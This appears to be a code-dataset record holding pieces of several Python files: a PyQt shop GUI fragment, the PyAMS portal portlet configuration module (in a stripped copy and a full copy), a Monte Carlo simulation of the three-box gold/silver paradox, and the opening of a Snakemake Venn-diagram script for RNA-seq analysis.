    def openDatabase(self):
        """Ask for a database file and open an SQLConnection on it."""
        path = QFileDialog.getOpenFileName(caption="Open Database",filter="Database file (*.db *.dat)")
        self.connection = SQLConnection(path)
        self.connection.open_database()
    def addCustomer(self):
        """Show the add-customer form as the central widget."""
        self.add_customer_widget = AddCustomerWidget()
        self.setCentralWidget(self.add_customer_widget)
        #connect the custom signal in the widget to our method
        self.add_customer_widget.customerAddedSignal.connect(self.saveCustomer)
    def saveCustomer(self):
        """Persist the entered customer details and clear the form.

        NOTE(review): assumes openDatabase() was called first --
        self.connection does not exist otherwise.
        """
        details = self.add_customer_widget.customer_details()
        self.connection.add_new_customer(details)
        self.add_customer_widget.clear_details()
    def addOrder(self):
        """Show the customer-order form as the central widget."""
        self.add_order_widget = CustomerOrderWidget(self.connection)
        self.setCentralWidget(self.add_order_widget)
def main():
    """Create the Qt application and main window and enter the event loop."""
    app = QApplication(sys.argv)
    window = ShopWindow()
    window.show()
    window.raise_()
    sys.exit(app.exec_())
main()
| 3,572 | 9 | 180 |
9aa3bd2b23226f521d7c52a9adbd1c90b631cff8 | 13,955 | py | Python | src/pyams_portal/portlet.py | Py-AMS/pyams-portal | a19f48079e683711394b8e57c05cf7cd9d20a888 | [
"ZPL-2.1"
] | null | null | null | src/pyams_portal/portlet.py | Py-AMS/pyams-portal | a19f48079e683711394b8e57c05cf7cd9d20a888 | [
"ZPL-2.1"
] | null | null | null | src/pyams_portal/portlet.py | Py-AMS/pyams-portal | a19f48079e683711394b8e57c05cf7cd9d20a888 | [
"ZPL-2.1"
] | null | null | null | #
# Copyright (c) 2015-2021 Thierry Florac <tflorac AT ulthar.net>
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
"""PyAMS_portal.portlet module
This module defines all portlet-related components.
"""
__docformat__ = 'restructuredtext'
import logging
import venusian
from persistent import Persistent
from persistent.mapping import PersistentMapping
from pyramid.exceptions import ConfigurationError
from zope.container.contained import Contained
from zope.copy import clone
from zope.interface import alsoProvides, implementer, noLongerProvides
from zope.lifecycleevent import ObjectCreatedEvent
from zope.location import locate
from zope.schema.fieldproperty import FieldProperty
from zope.schema.vocabulary import SimpleTerm, SimpleVocabulary
from zope.traversing.interfaces import ITraversable
from pyams_portal.interfaces import IPortalContext, IPortalPage, IPortalPortletsConfiguration, \
IPortalTemplate, IPortlet, IPortletConfiguration, IPortletRenderer, \
IPortletSettings, MANAGE_TEMPLATE_PERMISSION, PORTLETS_VOCABULARY_NAME
from pyams_security.interfaces import IViewContextPermissionChecker
from pyams_utils.adapter import ContextAdapter, adapter_config
from pyams_utils.factory import factory_config, get_object_factory, is_interface
from pyams_utils.registry import get_pyramid_registry
from pyams_utils.request import check_request
from pyams_utils.vocabulary import vocabulary_config
LOGGER = logging.getLogger('PyAMS (portal)')
@implementer(IPortlet)
class Portlet:
    """Base portlet utility"""
    # zope.schema-backed 'permission' field from IPortlet.
    permission = FieldProperty(IPortlet['permission'])
    # Optional toolbar icon image; subclasses may override.
    toolbar_image = None
    # CSS class used for the management-toolbar icon (Font Awesome style).
    toolbar_css_class = 'fa-edit'
    # Factory used to build this portlet's settings object; per the
    # PortletSettings docstring in this module, each portlet subclass must
    # define one (function, class or interface).
    settings_factory = None
class portlet_config: # pylint: disable=invalid-name
    """Class decorator used to declare a portlet"""
    # The venusian module is exposed as a class attribute so tests can
    # inject a stub in its place.
    venusian = venusian # for testing injection
    # NOTE(review): the decorator protocol methods (__init__/__call__) are
    # not visible in this excerpt.
@vocabulary_config(name=PORTLETS_VOCABULARY_NAME)
class PortletVocabulary(SimpleVocabulary):
    """Portlet vocabulary"""
    # Registered under PORTLETS_VOCABULARY_NAME via @vocabulary_config;
    # presumably consumed by choice fields listing available portlets.
#
# Portlet configuration
#
@implementer(IPortletSettings)
class PortletSettings(Persistent, Contained):
    """Portlet settings persistent class
    This class is supposed to be sub-classed by all custom portlet subclasses to
    store their configuration settings.
    Each portlet sub-class must define it's settings factory in it's "settings_factory" attribute.
    Given factory can be a function, a class or an interface; in this last case, implementation
    is looking for default object factory registered for this interface.
    """
    _renderer = FieldProperty(IPortletSettings['renderer'])
    __name__ = '++settings++'
    @property
    def visible(self):
        """Visibility getter"""
        # A portlet is visible unless its renderer is the special 'hidden' one.
        return self._renderer != 'hidden'
    @property
    def renderer(self):
        """Renderer name getter"""
        return self._renderer
    @renderer.setter
    def renderer(self, value):
        """Renderer setter

        Swaps the renderer *marker interface* on this settings object:
        the old renderer's target_interface is removed before the new
        renderer's target_interface is applied.
        """
        # Normalize None to '' (default renderer name); no-op when unchanged.
        value = value or ''
        if value == self._renderer:
            return
        request = check_request()
        registry = request.registry
        # Drop the marker interface provided by the OLD renderer, if any...
        renderer = registry.queryMultiAdapter((request.root, request, request, self),
                                              IPortletRenderer, name=self._renderer)
        if (renderer is not None) and (renderer.target_interface is not None):
            noLongerProvides(self, renderer.target_interface)
        self._renderer = value
        # ...then apply the marker interface of the NEW renderer, if any.
        renderer = registry.queryMultiAdapter((request.root, request, request, self),
                                              IPortletRenderer, name=self._renderer)
        if (renderer is not None) and (renderer.target_interface is not None):
            alsoProvides(self, renderer.target_interface)
    def get_renderer(self, request=None):
        """Renderer adapter getter"""
        if request is None:
            request = check_request()
        return request.registry.queryMultiAdapter((request.root, request, request, self),
                                                  IPortletRenderer, name=self._renderer)
    @property
    def configuration(self):
        """Configuration getter"""
        return self.__parent__
    @configuration.setter
    def configuration(self, value):
        """Configuration setter"""
        # Write-once: keep the first configuration this settings object
        # was attached to.
        if self.__parent__ is None:
            self.__parent__ = value
@adapter_config(required=IPortletSettings, provides=IViewContextPermissionChecker)
class PortletSettingsPermissionChecker(ContextAdapter):
    """Portlet settings permission checker"""
    # editing portlet settings requires the template management permission
    edit_permission = MANAGE_TEMPLATE_PERMISSION
@factory_config(IPortletConfiguration)
class PortletConfiguration(Persistent, Contained):
    """Portlet configuration persistent class
    This class is a generic persistent class which is used to store all portlet
    configuration and is *not* supposed to be sub-classed.
    PortletConfiguration.__parent__ points to context where configuration is applied
    (each context or local template).
    PortletConfiguration.parent points to context from where configuration is inherited.
    """
    portlet_id = FieldProperty(IPortletConfiguration['portlet_id'])
    # name of the matching IPortlet utility
    portlet_name = None
    _inherit_parent = FieldProperty(IPortletConfiguration['inherit_parent'])
    _settings = FieldProperty(IPortletConfiguration['settings'])
    def get_portlet(self):
        """Portlet utility getter: look up the IPortlet utility by stored name"""
        return get_pyramid_registry().queryUtility(IPortlet, name=self.portlet_name)
    @property
    def can_inherit(self):
        """Check if configuration can be inherited
        A configuration attached directly to a template has nothing to inherit from.
        """
        return not IPortalTemplate.providedBy(self.__parent__)
    @property
    def inherit_parent(self):
        """Check if inheritance is enabled; always False when inheritance is impossible"""
        return self._inherit_parent if self.can_inherit else False
    @inherit_parent.setter
    def inherit_parent(self, value):
        """Inheritance setter
        Enabling inheritance is only allowed when inheritance is possible.
        """
        if (not value) or self.can_inherit:
            self._inherit_parent = value
    @property
    def override_parent(self):
        """Parent overriding getter: logical negation of ``inherit_parent``"""
        return not self.inherit_parent
    @override_parent.setter
    def override_parent(self, value):
        """Parent overriding setter"""
        self.inherit_parent = not value
    @property
    def parent(self):
        """Parent getter
        Returns the template or context from which settings are actually
        inherited, walking up the context tree while inheritance is enabled.
        """
        parent = self.__parent__
        if IPortalTemplate.providedBy(parent):
            # a template-level configuration is its own source
            return parent
        while True:
            if IPortalContext.providedBy(parent):
                configuration = IPortalPortletsConfiguration(parent).get_portlet_configuration(
                    self.portlet_id)
                if not configuration.inherit_parent:
                    # this context overrides the portlet configuration
                    return parent
            page = IPortalPage(parent)
            if not page.inherit_parent:
                # the page defines its own template: stop walking up
                break
            parent = parent.__parent__
            if parent is None:
                break
        # fall back to the template of the last visited page, if any
        page = IPortalPage(parent, None)
        if page is not None:
            return page.template
        return None
    @property
    def settings(self):
        """Current settings getter (using inheritance settings)"""
        if self.inherit_parent:
            return IPortalPortletsConfiguration(self.parent).get_portlet_configuration(
                self.portlet_id).settings
        return self._settings
    @property
    def editor_settings(self):
        """Editor settings getter (always return local settings)"""
        return self._settings
    def get_settings(self, allow_inherit=True):
        """Settings getter (using inheritance or not according to allow_inherit argument)"""
        if allow_inherit:
            return self.settings
        return self._settings
@adapter_config(required=IPortlet, provides=IPortletConfiguration)
def portlet_configuration_adapter(portlet):
    """Portlet configuration factory
    Create a new ``PortletConfiguration`` for the given portlet utility.
    """
    return PortletConfiguration(portlet)
@adapter_config(required=IPortletConfiguration, provides=IPortletSettings)
def portlet_configuration_settings_adapter(configuration):
    """Portlet configuration settings adapter
    Return the (possibly inherited) settings of the given configuration.
    """
    return configuration.settings
@adapter_config(required=IPortletSettings, provides=IPortletConfiguration)
def portlet_settings_configuration_adapter(settings):
    """Portlet settings configuration adapter
    Return the configuration owning the given settings.
    """
    return settings.configuration
@adapter_config(name='settings',
                required=IPortletConfiguration, provides=ITraversable)
class PortletConfigurationSettingsTraverser(ContextAdapter):
    """++settings++ portlet configuration traverser"""
    def traverse(self, name, furtherpath=None): # pylint: disable=unused-argument
        """Portlet configuration traverser to settings
        Allows "++settings++" URL traversal from a configuration to its
        settings; *name* and *furtherpath* are ignored.
        """
        return self.context.settings
@adapter_config(required=IPortletConfiguration, provides=IViewContextPermissionChecker)
class PortletConfigurationPermissionChecker(ContextAdapter):
    """Portlet configuration permission checker"""
    # editing a portlet configuration requires the template management permission
    edit_permission = MANAGE_TEMPLATE_PERMISSION
#
# Template portlets configuration
#
@factory_config(IPortalPortletsConfiguration)
class PortalPortletsConfiguration(PersistentMapping, Contained):
    """Portal portlets configuration
    Persistent mapping of portlet ID to portlet configuration.
    """
    @classmethod
    def clone(cls, source_config, new_parent):
        """Clone source configuration
        Create a new configuration located inside *new_parent*, containing a
        copy of every portlet configuration of *source_config*.
        """
        configuration = source_config.__class__()
        get_pyramid_registry().notify(ObjectCreatedEvent(configuration))
        locate(configuration, new_parent)
        for config_id, config_portlet in source_config.items():
            # NB: bare ``clone`` here resolves to zope.copy.clone, not this classmethod
            config = clone(config_portlet)
            configuration[config_id] = config
        return configuration
    def get_portlet_configuration(self, portlet_id):
        """Portlet configuration getter
        When no local configuration exists, a clone of the inherited one
        (from the parent template) is created, stored and returned.
        """
        configuration = self.get(portlet_id)
        if configuration is None:
            if IPortalTemplate.providedBy(self.__parent__):
                portlets = IPortalPortletsConfiguration(self.__parent__)
            else:
                # non-template parents inherit through their page's template
                template = IPortalPage(self.__parent__).template
                portlets = IPortalPortletsConfiguration(template)
            configuration = clone(portlets.get_portlet_configuration(portlet_id))
            get_pyramid_registry().notify(ObjectCreatedEvent(configuration))
            self.set_portlet_configuration(portlet_id, configuration)
        return configuration
    def set_portlet_configuration(self, portlet_id, config):
        """Portlet configuration setter; stamps the ID onto the configuration"""
        config.portlet_id = portlet_id
        self[portlet_id] = config
    def delete_portlet_configuration(self, portlet_id):
        """Delete portlet configuration
        *portlet_id* may be a single integer ID or an iterable of IDs.
        """
        if isinstance(portlet_id, int):
            portlet_id = (portlet_id,)
        for p_id in portlet_id:
            del self[p_id]
| 36.341146 | 98 | 0.68771 | #
# Copyright (c) 2015-2021 Thierry Florac <tflorac AT ulthar.net>
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
"""PyAMS_portal.portlet module
This module defines all portlet-related components.
"""
__docformat__ = 'restructuredtext'
import logging
import venusian
from persistent import Persistent
from persistent.mapping import PersistentMapping
from pyramid.exceptions import ConfigurationError
from zope.container.contained import Contained
from zope.copy import clone
from zope.interface import alsoProvides, implementer, noLongerProvides
from zope.lifecycleevent import ObjectCreatedEvent
from zope.location import locate
from zope.schema.fieldproperty import FieldProperty
from zope.schema.vocabulary import SimpleTerm, SimpleVocabulary
from zope.traversing.interfaces import ITraversable
from pyams_portal.interfaces import IPortalContext, IPortalPage, IPortalPortletsConfiguration, \
IPortalTemplate, IPortlet, IPortletConfiguration, IPortletRenderer, \
IPortletSettings, MANAGE_TEMPLATE_PERMISSION, PORTLETS_VOCABULARY_NAME
from pyams_security.interfaces import IViewContextPermissionChecker
from pyams_utils.adapter import ContextAdapter, adapter_config
from pyams_utils.factory import factory_config, get_object_factory, is_interface
from pyams_utils.registry import get_pyramid_registry
from pyams_utils.request import check_request
from pyams_utils.vocabulary import vocabulary_config
LOGGER = logging.getLogger('PyAMS (portal)')
@implementer(IPortlet)
class Portlet:
    """Base portlet utility
    Concrete portlets sub-class this utility and are registered as named
    ``IPortlet`` utilities (see the ``portlet_config`` decorator).
    """
    # optional permission required to use the portlet
    permission = FieldProperty(IPortlet['permission'])
    # toolbar display: optional image, otherwise a CSS class (icon name)
    toolbar_image = None
    toolbar_css_class = 'fa-edit'
    # settings factory (function, class or interface); MUST be defined by
    # sub-classes -- see PortletSettings docstring
    settings_factory = None
class portlet_config: # pylint: disable=invalid-name
    """Class decorator used to declare a portlet

    Keyword arguments (``name``, ``permission``, ``registry``...) are kept
    and applied by a deferred venusian callback, which registers the
    decorated component as a named ``IPortlet`` utility during config scan.
    """
    venusian = venusian # for testing injection
    def __init__(self, **settings):
        # keep all keyword arguments; they are re-read as a dict in __call__
        self.__dict__.update(settings)
    def __call__(self, wrapped):
        settings = self.__dict__.copy()
        depth = settings.pop('_depth', 0)
        def callback(context, name, ob): # pylint: disable=invalid-name,unused-argument
            # portlet name: explicit setting first, then the component's own
            # 'name' attribute
            name = settings.get('name') or getattr(ob, 'name', name)
            if name is None:
                raise ConfigurationError("You must provide a name for a portlet")
            permission = settings.get('permission')
            if permission is not None:
                ob.permission = permission
            # classes are registered as factories, instances as components
            if type(ob) is type: # pylint: disable=unidiomatic-typecheck
                factory = ob
                component = None
            else:
                factory = None
                component = ob
            LOGGER.debug("Registering portlet {0} named '{1}'".format(
                str(component) if component else str(factory), name))
            # 'info' is bound below, before the scanner ever runs the callback
            config = context.config.with_package(info.module) # pylint: disable=no-member
            # an explicit 'registry' setting overrides the scanner's registry
            registry = settings.get('registry', config.registry)
            registry.registerUtility(component=component, factory=factory,
                                     provided=IPortlet, name=name)
        # defer the actual registration to the venusian scan
        info = self.venusian.attach(wrapped, callback, category='pyramid',
                                    depth=depth + 1)
        if info.scope == 'class': # pylint: disable=no-member
            # if the decorator was attached to a method in a class, or
            # otherwise executed at class scope, we need to set an
            # 'attr' into the settings if one isn't already in there
            if settings.get('attr') is None:
                settings['attr'] = wrapped.__name__
            settings['_info'] = info.codeinfo # pylint: disable=no-member
        return wrapped
@vocabulary_config(name=PORTLETS_VOCABULARY_NAME)
class PortletVocabulary(SimpleVocabulary):
    """Portlet vocabulary
    Vocabulary of all registered portlets, sorted by translated label.
    """
    def __init__(self, context): # pylint: disable=unused-argument
        request = check_request()
        translate = request.localizer.translate
        registered = request.registry.getUtilitiesFor(IPortlet)
        ordered = sorted(registered, key=lambda item: translate(item[1].label))
        terms = []
        for utility_name, utility in ordered:
            terms.append(SimpleTerm(utility_name, title=translate(utility.label)))
        super().__init__(terms)
#
# Portlet configuration
#
@implementer(IPortletSettings)
class PortletSettings(Persistent, Contained):
    """Portlet settings persistent class
    This class is supposed to be sub-classed by all custom portlet subclasses to
    store their configuration settings.
    Each portlet sub-class must define it's settings factory in it's "settings_factory" attribute.
    Given factory can be a function, a class or an interface; in this last case, implementation
    is looking for default object factory registered for this interface.
    """
    # current renderer name; the special name 'hidden' disables display (see ``visible``)
    _renderer = FieldProperty(IPortletSettings['renderer'])
    # settings are traversed through the '++settings++' namespace
    __name__ = '++settings++'
    def __init__(self, configuration=None):
        # settings are located inside their owning configuration
        self.__parent__ = configuration
    @property
    def visible(self):
        """Visibility getter: a portlet is visible unless its renderer is 'hidden'"""
        return self._renderer != 'hidden'
    @property
    def renderer(self):
        """Renderer name getter"""
        return self._renderer
    @renderer.setter
    def renderer(self, value):
        """Renderer setter
        Switching renderer also drops the target interface provided by the
        previous renderer, if any, and applies the one of the new renderer.
        """
        value = value or ''
        if value == self._renderer:
            return
        request = check_request()
        registry = request.registry
        # remove the target interface of the *current* renderer before switching
        renderer = registry.queryMultiAdapter((request.root, request, request, self),
                                              IPortletRenderer, name=self._renderer)
        if (renderer is not None) and (renderer.target_interface is not None):
            noLongerProvides(self, renderer.target_interface)
        self._renderer = value
        # apply the target interface of the *new* renderer, if any
        renderer = registry.queryMultiAdapter((request.root, request, request, self),
                                              IPortletRenderer, name=self._renderer)
        if (renderer is not None) and (renderer.target_interface is not None):
            alsoProvides(self, renderer.target_interface)
    def get_renderer(self, request=None):
        """Renderer adapter getter
        Looks up the ``IPortletRenderer`` multi-adapter matching the current
        renderer name; *request* defaults to the current request.
        """
        if request is None:
            request = check_request()
        return request.registry.queryMultiAdapter((request.root, request, request, self),
                                                  IPortletRenderer, name=self._renderer)
    @property
    def configuration(self):
        """Configuration getter: the owning portlet configuration is our parent"""
        return self.__parent__
    @configuration.setter
    def configuration(self, value):
        """Configuration setter
        Write-once: only applied when the settings are not already located.
        """
        if self.__parent__ is None:
            self.__parent__ = value
@adapter_config(required=IPortletSettings, provides=IViewContextPermissionChecker)
class PortletSettingsPermissionChecker(ContextAdapter):
    """Portlet settings permission checker"""
    # editing portlet settings requires the template management permission
    edit_permission = MANAGE_TEMPLATE_PERMISSION
@factory_config(IPortletConfiguration)
class PortletConfiguration(Persistent, Contained):
    """Portlet configuration persistent class
    This class is a generic persistent class which is used to store all portlet
    configuration and is *not* supposed to be sub-classed.
    PortletConfiguration.__parent__ points to context where configuration is applied
    (each context or local template).
    PortletConfiguration.parent points to context from where configuration is inherited.
    """
    portlet_id = FieldProperty(IPortletConfiguration['portlet_id'])
    # name of the matching IPortlet utility
    portlet_name = None
    _inherit_parent = FieldProperty(IPortletConfiguration['inherit_parent'])
    _settings = FieldProperty(IPortletConfiguration['settings'])
    def __init__(self, portlet):
        self.portlet_name = portlet.name
        factory = portlet.settings_factory
        if is_interface(factory):
            # interfaces are resolved to their registered default object factory
            factory = get_object_factory(factory)
        assert factory is not None, "Missing portlet settings factory"
        settings = factory()
        settings.configuration = self
        self._settings = settings
    def get_portlet(self):
        """Portlet utility getter: look up the IPortlet utility by stored name"""
        return get_pyramid_registry().queryUtility(IPortlet, name=self.portlet_name)
    @property
    def can_inherit(self):
        """Check if configuration can be inherited
        A configuration attached directly to a template has nothing to inherit from.
        """
        return not IPortalTemplate.providedBy(self.__parent__)
    @property
    def inherit_parent(self):
        """Check if inheritance is enabled; always False when inheritance is impossible"""
        return self._inherit_parent if self.can_inherit else False
    @inherit_parent.setter
    def inherit_parent(self, value):
        """Inheritance setter
        Enabling inheritance is only allowed when inheritance is possible.
        """
        if (not value) or self.can_inherit:
            self._inherit_parent = value
    @property
    def override_parent(self):
        """Parent overriding getter: logical negation of ``inherit_parent``"""
        return not self.inherit_parent
    @override_parent.setter
    def override_parent(self, value):
        """Parent overriding setter"""
        self.inherit_parent = not value
    @property
    def parent(self):
        """Parent getter
        Returns the template or context from which settings are actually
        inherited, walking up the context tree while inheritance is enabled.
        """
        parent = self.__parent__
        if IPortalTemplate.providedBy(parent):
            # a template-level configuration is its own source
            return parent
        while True:
            if IPortalContext.providedBy(parent):
                configuration = IPortalPortletsConfiguration(parent).get_portlet_configuration(
                    self.portlet_id)
                if not configuration.inherit_parent:
                    # this context overrides the portlet configuration
                    return parent
            page = IPortalPage(parent)
            if not page.inherit_parent:
                # the page defines its own template: stop walking up
                break
            parent = parent.__parent__
            if parent is None:
                break
        # fall back to the template of the last visited page, if any
        page = IPortalPage(parent, None)
        if page is not None:
            return page.template
        return None
    @property
    def settings(self):
        """Current settings getter (using inheritance settings)"""
        if self.inherit_parent:
            return IPortalPortletsConfiguration(self.parent).get_portlet_configuration(
                self.portlet_id).settings
        return self._settings
    @property
    def editor_settings(self):
        """Editor settings getter (always return local settings)"""
        return self._settings
    def get_settings(self, allow_inherit=True):
        """Settings getter (using inheritance or not according to allow_inherit argument)"""
        if allow_inherit:
            return self.settings
        return self._settings
@adapter_config(required=IPortlet, provides=IPortletConfiguration)
def portlet_configuration_adapter(portlet):
    """Portlet configuration factory
    Create a new ``PortletConfiguration`` for the given portlet utility.
    """
    return PortletConfiguration(portlet)
@adapter_config(required=IPortletConfiguration, provides=IPortletSettings)
def portlet_configuration_settings_adapter(configuration):
    """Portlet configuration settings adapter
    Return the (possibly inherited) settings of the given configuration.
    """
    return configuration.settings
@adapter_config(required=IPortletSettings, provides=IPortletConfiguration)
def portlet_settings_configuration_adapter(settings):
    """Portlet settings configuration adapter
    Return the configuration owning the given settings.
    """
    return settings.configuration
@adapter_config(name='settings',
                required=IPortletConfiguration, provides=ITraversable)
class PortletConfigurationSettingsTraverser(ContextAdapter):
    """++settings++ portlet configuration traverser"""
    def traverse(self, name, furtherpath=None): # pylint: disable=unused-argument
        """Portlet configuration traverser to settings
        Allows "++settings++" URL traversal from a configuration to its
        settings; *name* and *furtherpath* are ignored.
        """
        return self.context.settings
@adapter_config(required=IPortletConfiguration, provides=IViewContextPermissionChecker)
class PortletConfigurationPermissionChecker(ContextAdapter):
    """Portlet configuration permission checker"""
    # editing a portlet configuration requires the template management permission
    edit_permission = MANAGE_TEMPLATE_PERMISSION
#
# Template portlets configuration
#
@factory_config(IPortalPortletsConfiguration)
class PortalPortletsConfiguration(PersistentMapping, Contained):
    """Portal portlets configuration
    Persistent mapping of portlet ID to portlet configuration.
    """
    @classmethod
    def clone(cls, source_config, new_parent):
        """Clone source configuration"""
        # NB: bare ``clone(...)`` below resolves to zope.copy.clone, not
        # this classmethod (class scope is skipped by name lookup)
        target = source_config.__class__()
        get_pyramid_registry().notify(ObjectCreatedEvent(target))
        locate(target, new_parent)
        for config_id, portlet_config in source_config.items():
            target[config_id] = clone(portlet_config)
        return target
    def __setitem__(self, key, value):
        # store the configuration, then locate it inside our own parent
        super().__setitem__(key, value)
        locate(value, self.__parent__, '++portlet++{0}'.format(key))
    def get_portlet_configuration(self, portlet_id):
        """Portlet configuration getter
        When no local configuration exists, a clone of the inherited one is
        created, stored and returned.
        """
        existing = self.get(portlet_id)
        if existing is not None:
            return existing
        owner = self.__parent__
        if IPortalTemplate.providedBy(owner):
            inherited = IPortalPortletsConfiguration(owner)
        else:
            inherited = IPortalPortletsConfiguration(IPortalPage(owner).template)
        new_config = clone(inherited.get_portlet_configuration(portlet_id))
        get_pyramid_registry().notify(ObjectCreatedEvent(new_config))
        self.set_portlet_configuration(portlet_id, new_config)
        return new_config
    def set_portlet_configuration(self, portlet_id, config):
        """Portlet configuration setter; stamps the ID onto the configuration"""
        config.portlet_id = portlet_id
        self[portlet_id] = config
    def delete_portlet_configuration(self, portlet_id):
        """Delete portlet configuration
        *portlet_id* may be a single integer ID or an iterable of IDs.
        """
        ids = (portlet_id,) if isinstance(portlet_id, int) else portlet_id
        for single_id in ids:
            del self[single_id]
| 2,700 | 0 | 162 |
bc5db1a7313edd0e614dac7de99e16d9af554f32 | 1,252 | py | Python | simulate.py | trevharmon/gold-silver-3box | 8d1428e2400c6abbcfb862f69a3432cf882701de | [
"Apache-2.0"
] | null | null | null | simulate.py | trevharmon/gold-silver-3box | 8d1428e2400c6abbcfb862f69a3432cf882701de | [
"Apache-2.0"
] | null | null | null | simulate.py | trevharmon/gold-silver-3box | 8d1428e2400c6abbcfb862f69a3432cf882701de | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""Monte-Carlo simulation of the Bertrand three-box (gold/silver) paradox."""
import random
import time


def simulate(tests, seed=None):
    """Run *tests* random draws; return (draws, total_gold_1, total_gold_2).

    draws[d][box][ball] counts how often each ball of each box came up on
    draw *d* (0 = first random draw, 1 = the other ball of the same box).
    total_gold_1 counts trials whose first ball was gold; total_gold_2
    counts trials where BOTH balls of the chosen box were gold.
    """
    boxes = [['G', 'G'],
             ['G', 'S'],
             ['S', 'S']]
    draws = [[[0, 0], [0, 0], [0, 0]],
             [[0, 0], [0, 0], [0, 0]]]
    total_gold_1 = 0
    total_gold_2 = 0
    rng = random.Random(seed)
    for _ in range(tests):
        box = rng.randint(0, 2)
        ball = rng.randint(0, 1)
        draws[0][box][ball] += 1
        # compare strings with ==, not 'is': identity only works by accident
        # for interned literals (and raises SyntaxWarning on Python >= 3.8)
        first_is_gold = boxes[box][ball] == 'G'
        if first_is_gold:
            total_gold_1 += 1
        ball = (ball + 1) % 2
        draws[1][box][ball] += 1
        # only count a second gold when the first ball was gold too: the
        # paradox asks for P(second gold | first gold), which tends to 2/3
        if first_is_gold and boxes[box][ball] == 'G':
            total_gold_2 += 1
    return draws, total_gold_1, total_gold_2


def main(tests=1000000):
    """Run the simulation and print per-box and summary counts."""
    print('Running %d tests.' % (tests))
    draws, total_gold_1, total_gold_2 = simulate(tests, seed=int(time.time()))
    print('Draws:')
    print('- Box 1 [G, G]:')
    print(' Gold1 -> Gold2: %d' % (draws[0][0][0]))
    print(' Gold2 -> Gold1: %d' % (draws[0][0][1]))
    print('- Box 2 [G, S]:')
    print(' Gold -> Silver: %d' % (draws[0][1][0]))
    print(' Silver: %d' % (draws[0][1][1]))
    print('- Box 3 [S, S]:')
    print(' Silver1: %d' % (draws[0][2][0]))
    print(' Silver2: %d' % (draws[0][2][1]))
    print('')
    print('Gold on 1st draw: %d' % (total_gold_1))
    print('Gold on both draws: %d' % (total_gold_2))
    if total_gold_1:
        # scale by 100: the raw ratio is a fraction, not a percentage
        print('Percent two golds: %.2f%%' % (100.0 * total_gold_2 / total_gold_1))


if __name__ == '__main__':
    main()
| 29.809524 | 78 | 0.517572 | #!/usr/bin/env python
"""Monte-Carlo simulation of the Bertrand three-box (gold/silver) paradox."""
import random
import time


def simulate(tests, seed=None):
    """Run *tests* random draws; return (draws, total_gold_1, total_gold_2).

    draws[d][box][ball] counts how often each ball of each box came up on
    draw *d* (0 = first random draw, 1 = the other ball of the same box).
    total_gold_1 counts trials whose first ball was gold; total_gold_2
    counts trials where BOTH balls of the chosen box were gold.
    """
    boxes = [['G', 'G'],
             ['G', 'S'],
             ['S', 'S']]
    draws = [[[0, 0], [0, 0], [0, 0]],
             [[0, 0], [0, 0], [0, 0]]]
    total_gold_1 = 0
    total_gold_2 = 0
    rng = random.Random(seed)
    for _ in range(tests):
        box = rng.randint(0, 2)
        ball = rng.randint(0, 1)
        draws[0][box][ball] += 1
        # compare strings with ==, not 'is': identity only works by accident
        # for interned literals (and raises SyntaxWarning on Python >= 3.8)
        first_is_gold = boxes[box][ball] == 'G'
        if first_is_gold:
            total_gold_1 += 1
        ball = (ball + 1) % 2
        draws[1][box][ball] += 1
        # only count a second gold when the first ball was gold too: the
        # paradox asks for P(second gold | first gold), which tends to 2/3
        if first_is_gold and boxes[box][ball] == 'G':
            total_gold_2 += 1
    return draws, total_gold_1, total_gold_2


def main(tests=1000000):
    """Run the simulation and print per-box and summary counts."""
    print('Running %d tests.' % (tests))
    draws, total_gold_1, total_gold_2 = simulate(tests, seed=int(time.time()))
    print('Draws:')
    print('- Box 1 [G, G]:')
    print(' Gold1 -> Gold2: %d' % (draws[0][0][0]))
    print(' Gold2 -> Gold1: %d' % (draws[0][0][1]))
    print('- Box 2 [G, S]:')
    print(' Gold -> Silver: %d' % (draws[0][1][0]))
    print(' Silver: %d' % (draws[0][1][1]))
    print('- Box 3 [S, S]:')
    print(' Silver1: %d' % (draws[0][2][0]))
    print(' Silver2: %d' % (draws[0][2][1]))
    print('')
    print('Gold on 1st draw: %d' % (total_gold_1))
    print('Gold on both draws: %d' % (total_gold_2))
    if total_gold_1:
        # scale by 100: the raw ratio is a fraction, not a percentage
        print('Percent two golds: %.2f%%' % (100.0 * total_gold_2 / total_gold_1))


if __name__ == '__main__':
    main()
| 0 | 0 | 0 |
0fb7fb95900ecf367a17b0e5bad2f5a6a92e2e5d | 3,961 | py | Python | workflow/scripts/VennDiagrams.py | sanjaynagi/rna-seq-pop | fedbdd374837876947be5c4d113f05a1577045ca | [
"MIT"
] | 2 | 2021-06-22T13:05:43.000Z | 2022-01-31T08:00:33.000Z | workflow/scripts/VennDiagrams.py | sanjaynagi/rna-seq-pop | fedbdd374837876947be5c4d113f05a1577045ca | [
"MIT"
] | 3 | 2021-06-18T09:22:29.000Z | 2022-03-26T19:52:11.000Z | workflow/scripts/VennDiagrams.py | sanjaynagi/rna-seq-pop | fedbdd374837876947be5c4d113f05a1577045ca | [
"MIT"
] | 1 | 2021-12-16T03:11:02.000Z | 2021-12-16T03:11:02.000Z | #!/usr/bin/env python3
"""
A script to get the intersections of Differential expression results, Fst, and differential SNPs analysis.
Draws Venn diagrams and adds columns to RNA-seq-diff.xlsx, whether the gene has high Fst/PBS/diffsnps.
"""
import sys
sys.stderr = open(snakemake.log[0], "w")
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from matplotlib_venn import *
import pandas as pd
import numpy as np
from pathlib import Path
#### Main ####
# Read contrasts in and other snakemake params
comparisons = pd.DataFrame(snakemake.params['DEcontrasts'], columns=['contrast'])
